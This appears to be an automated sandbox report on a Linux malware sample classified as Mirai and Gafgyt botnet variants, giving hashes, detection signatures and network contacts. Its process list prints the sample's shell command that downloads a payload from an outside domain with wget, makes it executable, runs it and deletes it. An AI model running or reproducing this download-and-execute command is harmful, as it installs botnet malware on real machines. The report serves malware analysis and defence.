Malware Analysis Report

2025-06-15 22:00

Sample ID 220411-jzeezafbh9
Target 65e8a78d64704cc9af4d19ef090ed81e
SHA256 2d5207861f9e0ed521792b82920b218535499c8a02932b484f0a9df375992986
Tags
gafgyt mirai mirai_x86corona
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2d5207861f9e0ed521792b82920b218535499c8a02932b484f0a9df375992986

Threat Level: Known bad

The file 65e8a78d64704cc9af4d19ef090ed81e was found to be: Known bad.

Malicious Activity Summary

gafgyt mirai mirai_x86corona

Detect Mirai Payload

Detected Gafgyt Variant

Detected x86corona Mirai Variant

Gafgyt family

Mirai family

Mirai_x86corona family

Modifies hosts file

Writes DNS configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-04-11 08:06

Signatures

Detect Mirai Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detected Gafgyt Variant

Description Indicator Process Target
N/A N/A N/A N/A

Detected x86corona Mirai Variant

Description Indicator Process Target
N/A N/A N/A N/A

Gafgyt family

gafgyt

Mirai family

mirai

Mirai_x86corona family

mirai_x86corona

Analysis: behavioral1

Detonation Overview

Submitted

2022-04-11 08:06

Reported

2022-04-11 08:11

Platform

ubuntu1804-amd64-en-20211208

Max time kernel

10682s

Max time network

142s

Command Line

[./65e8a78d64704cc9af4d19ef090ed81e]

Signatures

Modifies hosts file

Description Indicator Process Target
/etc/hosts /etc/hosts /usr/bin/wget N/A

Writes DNS configuration

Description Indicator Process Target
/etc/resolv.conf /etc/resolv.conf /usr/bin/wget N/A

Processes

./65e8a78d64704cc9af4d19ef090ed81e

[./65e8a78d64704cc9af4d19ef090ed81e]

/bin/sh

[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]

/usr/bin/wget

[wget -q http://gay.energy/.../vivid -O .....]

/bin/chmod

[chmod 777 .....]

./.....

[./.....]

/bin/sh

[/bin/sh ./.....]

/bin/rm

[rm -rf .....]

Network

Country Destination Domain Proto
RU 45.153.231.64:666 tcp
US 1.1.1.1:53 gay.energy udp
US 1.1.1.1:53 gay.energy udp
RU 45.153.231.64:666 tcp
RU 45.153.231.64:666 tcp
RU 45.153.231.64:666 tcp
RU 45.153.231.64:666 tcp
RU 45.153.231.64:666 tcp
RU 45.153.231.64:666 tcp
RU 45.153.231.64:666 tcp
RU 45.153.231.64:666 tcp
RU 45.153.231.64:666 tcp

Files

N/A